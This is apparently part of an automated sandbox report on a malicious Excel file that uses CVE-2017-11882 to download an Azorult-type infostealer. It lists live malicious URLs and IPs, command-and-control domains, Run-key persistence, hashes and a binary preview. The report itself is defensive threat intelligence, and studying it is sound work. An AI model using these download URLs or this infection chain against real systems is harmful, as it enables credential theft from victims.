Tries to harvest and steal browser information (history, passwords, etc) 24->69 33 timeout.exe 29->33         started        file13 signatures14 process15

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Scanjet 23002022.xlsx30%ReversingLabsDocument-OLE.Exploit.CVE-2017-11882

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe54%ReversingLabsByteCode-MSIL.Infostealer.Azorult
              C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-console-l1-1-0.dll0%MetadefenderBrowse
              C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-datetime-l1-1-0.dll0%MetadefenderBrowse
              C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-debug-l1-1-0.dll0%MetadefenderBrowse
              C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-errorhandling-l1-1-0.dll0%MetadefenderBrowse
              C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-file-l1-1-0.dll0%MetadefenderBrowse
              C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-file-l1-2-0.dll0%MetadefenderBrowse
              C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-file-l2-1-0.dll0%MetadefenderBrowse
              C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-handle-l1-1-0.dll0%MetadefenderBrowse
              C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              9.0.vbc.exe.400000.15.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              9.0.vbc.exe.400000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              4.2.vbc.exe.f20000.1.unpack100%AviraHEUR/AGEN.1139852Download File
              9.0.vbc.exe.400000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              9.0.vbc.exe.400000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              9.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1108759Download File
              9.0.vbc.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              11.2.Pthmzffh.exe.c40000.0.unpack100%AviraHEUR/AGEN.1139852Download File
              9.0.vbc.exe.400000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://192.210.218.119/22/vbc.exe100%Avira URL Cloudmalware
              http://etapackbg.com/css/Sngggz.png100%Avira URL Cloudmalware
              http://clamprite.ga/azo01/index.phph100%Avira URL Cloudmalware
              http://ocsp.thawte.com00%URL Reputationsafe
              http://www.mozilla.com00%URL Reputationsafe
              https://dotbit.me/a/0%URL Reputationsafe
              http://etapackbg.com100%Avira URL Cloudmalware
              http://clamprite.ga/azo01/index.php100%Avira URL Cloudmalware
              http://etapackbg.com/css/Sngggz.png;Apwjojdzaicrizygsmmd.Zpaxmptx100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              etapackbg.com
              		172.67.166.49
              		truetrue
                		unknown
                clamprite.ga
                		80.66.64.174
                		truetrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://192.210.218.119/22/vbc.exetrue
                  • Avira URL Cloud: malware
                  		unknown
                  http://etapackbg.com/css/Sngggz.pngtrue
                  • Avira URL Cloud: malware
                  		unknown
                  http://clamprite.ga/azo01/index.phptrue
                  • Avira URL Cloud: malware
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.msn.com/de-de/?ocid=iehp$vbc.exe, 00000009.00000002.675417727.00000000004F5000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://contextual.media.net/checksync.pvbc.exe, 00000009.00000002.676388319.0000000003EB0000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.mozilla.com/en-US/blocklist/vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://stackoverflow.com/q/14436606/23354vbc.exe, 00000004.00000002.604891788.0000000000E60000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.608049872.0000000003483000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.606388990.00000000025E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.607033085.0000000003361000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.606099043.00000000023AE000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://github.com/mgravell/protobuf-netJvbc.exe, 00000004.00000002.604891788.0000000000E60000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.608049872.0000000003483000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.607033085.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1vbc.exe, 00000009.00000002.675447446.0000000000528000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://clamprite.ga/azo01/index.phphvbc.exe, 00000009.00000002.675417727.00000000004F5000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://contextual.media.net/medianet.phpvbc.exe, 00000009.00000002.676388319.0000000003EB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://ocsp.thawte.com0vbc.exe, 00000009.00000003.671255777.0000000003F4C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670889097.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670982811.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657260286.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657360630.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659672132.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.655968619.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671690389.0000000004124000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656593935.00000000042B8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656670065.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671456850.00000000040E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j0j46j0l2j46j0j5.485j0j8&sourceid=chrovbc.exe, 00000009.00000002.677445164.0000000004BC4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.675447446.0000000000528000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676901801.0000000004850000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://ip-api.com/jsonvbc.exe, vbc.exe, 00000009.00000000.602581852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.601844130.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.mozilla.com0vbc.exe, 00000009.00000003.671255777.0000000003F4C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670889097.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670982811.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657260286.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657360630.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659672132.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.663004977.000000000428C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.655968619.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671690389.0000000004124000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656593935.00000000042B8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656670065.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671456850.00000000040E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.msn.com/de-de/vbc.exe, 00000009.00000002.676388319.0000000003EB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://dotbit.me/a/vbc.exe, vbc.exe, 00000009.00000000.602581852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.601844130.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://github.com/mgravell/protobuf-netvbc.exe, 00000004.00000002.604891788.0000000000E60000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.608049872.0000000003483000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.607033085.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2vbc.exe, 00000009.00000002.675447446.0000000000528000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.msn.com/vbc.exe, 00000009.00000002.676388319.0000000003EB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/mgravell/protobuf-netivbc.exe, 00000004.00000002.604891788.0000000000E60000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.608049872.0000000003483000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.607033085.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://crl.thawte.com/ThawteTimestampingCA.crl0vbc.exe, 00000009.00000003.671255777.0000000003F4C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670889097.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670982811.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657260286.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657360630.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659672132.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.655968619.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671690389.0000000004124000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656593935.00000000042B8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656670065.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671456850.00000000040E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://stackoverflow.com/q/11564914/23354;vbc.exe, 00000004.00000002.604891788.0000000000E60000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.608049872.0000000003483000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.607033085.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://stackoverflow.com/q/2152978/23354vbc.exe, 00000004.00000002.604891788.0000000000E60000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.608049872.0000000003483000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.607033085.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.msn.com/?ocid=iehpvbc.exe, 00000009.00000002.675417727.00000000004F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://etapackbg.comvbc.exe, 00000004.00000002.605817686.0000000002361000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      https://contextual.media.net/checksync.phpvbc.exe, 00000009.00000002.676388319.0000000003EB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.605817686.0000000002361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://etapackbg.com/css/Sngggz.png;Apwjojdzaicrizygsmmd.Zpaxmptxvbc.exe, 00000004.00000002.605581813.0000000000F22000.00000020.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000000.459111819.0000000000F22000.00000020.00000001.01000000.00000003.sdmp, vbc.exe, 00000009.00000000.599486854.0000000000F22000.00000020.00000001.01000000.00000003.sdmptrue
                                                          • Avira URL Cloud: malware
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          80.66.64.174
                                                          		clamprite.gaRussian Federation
                                                          		202723VAD-SRL-AS1MDtrue
                                                          172.67.166.49
                                                          		etapackbg.comUnited States
                                                          		13335CLOUDFLARENETUStrue
                                                          192.210.218.119
                                                          		unknownUnited States
                                                          		36352AS-COLOCROSSINGUStrue

                                                          General Information

                                                          Joe Sandbox Version:34.0.0 Boulder Opal
                                                          Analysis ID:579140
                                                          Start date:26.02.2022
                                                          Start time:09:28:52
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 12m 39s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Sample file name:Scanjet 23002022.xlsx
                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                          Number of analysed new started processes analysed:15
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.expl.evad.winXLSX@15/70@3/3
                                                          EGA Information:
                                                          • Successful, ratio: 66.7%
                                                          HDC Information:
                                                          • Successful, ratio: 21.8% (good quality ratio 21.4%)
                                                          • Quality average: 80.5%
                                                          • Quality standard deviation: 27.3%
                                                          HCA Information:
                                                          • Successful, ratio: 99%
                                                          • Number of executed functions: 421
                                                          • Number of non-executed functions: 68
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found application associated with file extension: .xlsx
                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                          • Attach to Office via COM
                                                          • Scroll down
                                                          • Close Viewer

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                          • Execution Graph export aborted for target Pthmzffh.exe, PID 2128 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • VT rate limit hit for: Scanjet 23002022.xlsx

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          09:29:40API Interceptor62x Sleep call for process: EQNEDT32.EXE modified
                                                          09:29:43API Interceptor836x Sleep call for process: vbc.exe modified
                                                          09:30:51AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Pthmzffh "C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe"
                                                          09:31:02AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Pthmzffh "C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe"
                                                          09:31:03API Interceptor168x Sleep call for process: Pthmzffh.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          80.66.64.174triage_dropped_file.exeGet hashmaliciousBrowse
                                                          • venis.ml/
                                                          192.210.218.119Project Oder Inquiry.xlsxGet hashmaliciousBrowse
                                                          • 192.210.218.119/250/vbc.exe
                                                          Purchase Order BE2101008.xlsxGet hashmaliciousBrowse
                                                          • 192.210.218.119/343/vbc.exe

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          clamprite.ga110#U5e74#U5ea6#U6263#U7e73#U6191#U55ae.xlsxGet hashmaliciousBrowse
                                                          • 5.188.88.216

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          VAD-SRL-AS1MD7jjfXx5Cu7.exeGet hashmaliciousBrowse
                                                          • 80.66.64.170
                                                          triage_dropped_file.exeGet hashmaliciousBrowse
                                                          • 80.66.64.174
                                                          RCMexKbIU3.exeGet hashmaliciousBrowse
                                                          • 80.66.64.170
                                                          Vc8dPEpjFH.exeGet hashmaliciousBrowse
                                                          • 80.66.64.170
                                                          tq3yw6j49U.exeGet hashmaliciousBrowse
                                                          • 80.66.64.170
                                                          BUhNgtcbTN.exeGet hashmaliciousBrowse
                                                          • 80.66.64.170
                                                          SfB2RdDROn.exeGet hashmaliciousBrowse
                                                          • 80.66.64.170
                                                          9msMAsvMBW.exeGet hashmaliciousBrowse
                                                          • 80.66.64.170
                                                          ZFRDbtEtSQ.exeGet hashmaliciousBrowse
                                                          • 80.66.64.189
                                                          5ErljUT1os.exeGet hashmaliciousBrowse
                                                          • 80.66.64.170
                                                          PDDm7EfkTH.exeGet hashmaliciousBrowse
                                                          • 80.66.64.170
                                                          piZOHbJ53i.exeGet hashmaliciousBrowse
                                                          • 80.66.64.170
                                                          jLXWMPuslV.exeGet hashmaliciousBrowse
                                                          • 80.66.64.180
                                                          tWYMz1hZjE.exeGet hashmaliciousBrowse
                                                          • 80.66.64.180
                                                          j7RNE6O3pc.exeGet hashmaliciousBrowse
                                                          • 80.66.64.180
                                                          bjdOAOlX3H.exeGet hashmaliciousBrowse
                                                          • 80.66.64.189
                                                          82346F3A4B7E84F746F6242FF70265B1467FFDCD01954.exeGet hashmaliciousBrowse
                                                          • 80.66.64.170
                                                          WJl4XjibKI.exeGet hashmaliciousBrowse
                                                          • 80.66.64.170
                                                          yPLktoDLSm.exeGet hashmaliciousBrowse
                                                          • 80.66.64.181
                                                          xI0ROzCdvZ.exeGet hashmaliciousBrowse
                                                          • 80.66.64.181

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-console-l1-1-0.dllkendrickzx.exeGet hashmaliciousBrowse
                                                            YWwWTAJQeT.exeGet hashmaliciousBrowse
                                                              New Purchase Order (PO#0060919).exeGet hashmaliciousBrowse
                                                                D42926EB5339410141C90BAD9B9B0B3C5CC00FCF0E1A4.exeGet hashmaliciousBrowse
                                                                  tAWBSuntmR.exeGet hashmaliciousBrowse
                                                                    3pSZ2QZRAR.exeGet hashmaliciousBrowse
                                                                      IRQ2107799.jarGet hashmaliciousBrowse
                                                                        Payment Swift Transfer.jarGet hashmaliciousBrowse
                                                                          ORDER LIST.exeGet hashmaliciousBrowse
                                                                            I-PK-66729559684-D027834252022011003150.exeGet hashmaliciousBrowse
                                                                              MT103_Payment.exeGet hashmaliciousBrowse
                                                                                AYXn09n9uH.exeGet hashmaliciousBrowse
                                                                                  fATnlYABZv.exeGet hashmaliciousBrowse
                                                                                    pre-alert KFL031321141885.jarGet hashmaliciousBrowse
                                                                                      Remittance Detail Report.jar.jarGet hashmaliciousBrowse
                                                                                        I-PK-6672955726-D027834252022011003150.exeGet hashmaliciousBrowse
                                                                                          I-PK-6672955726-D027834252022011003150.exeGet hashmaliciousBrowse
                                                                                            Order.exeGet hashmaliciousBrowse
                                                                                              Purchase Order.exeGet hashmaliciousBrowse
                                                                                                Proposal.exeGet hashmaliciousBrowse

                                                                                                  Created / dropped Files

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:downloaded
                                                                                                  Size (bytes):196608
                                                                                                  Entropy (8bit):4.954046985613375
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:B/fgVgb2KTbpyRAclDWz98JfkT7M9Q5UyB:JgSbJbwScsqJMj
                                                                                                  MD5:8620EEAF925B0C5943C5B0A217797A32
                                                                                                  SHA1:A5D8E44B1FFC4AB251026C5381559884901593D0
                                                                                                  SHA-256:567BC9BBF28D175408E7CF8055066CD723F71E3A23BEEFE06038F3EB4795C1DA
                                                                                                  SHA-512:A919376BE6FEB5EA6653FA6B04EC1B6EFF9BFF5E9E0E2A7CD2D327730D330302091328F555263D6237CFC7AC4A5B098B12FE20476F929560236A9A9E6D1F960D
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 54%
                                                                                                  Reputation:low
                                                                                                  IE Cache URL:http://192.210.218.119/22/vbc.exe
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...K_................0..8...........V... ...`....@.. .......................`............@..................................U..K....`.......................@....................................................... ............... ..H............text...46... ...8.................. ..`.rsrc........`.......:..............@..@.reloc.......@......................@..B.................V......H........0...$..........$U...............................................0..6........(.........(.....(....(....o.....(.....(.......8.....*..".(.....*..........(....r...p......%......(.....(...........%..P.o....&*.0...........s....%r...po.....%r...po.....%.o......8.....*..".(.....*....0..T......... ....(...........&.......r5..p(....o....o....s.... .^[.o.......(.....(.....o....&*................".(.....*....0............(....o.......8..........o........8t...........o....r}..p(.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3C064603.png

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5396
                                                                                                  Entropy (8bit):7.915293088075047
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
                                                                                                  MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
                                                                                                  SHA1:556C229F539D60F1FF434103EC1695C7554EB720
                                                                                                  SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
                                                                                                  SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
                                                                                                  Malicious:false
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3D98C6D.png

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2647
                                                                                                  Entropy (8bit):7.8900124483490135
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
                                                                                                  MD5:E46357D82EBC866EEBDA98FA8F94B385
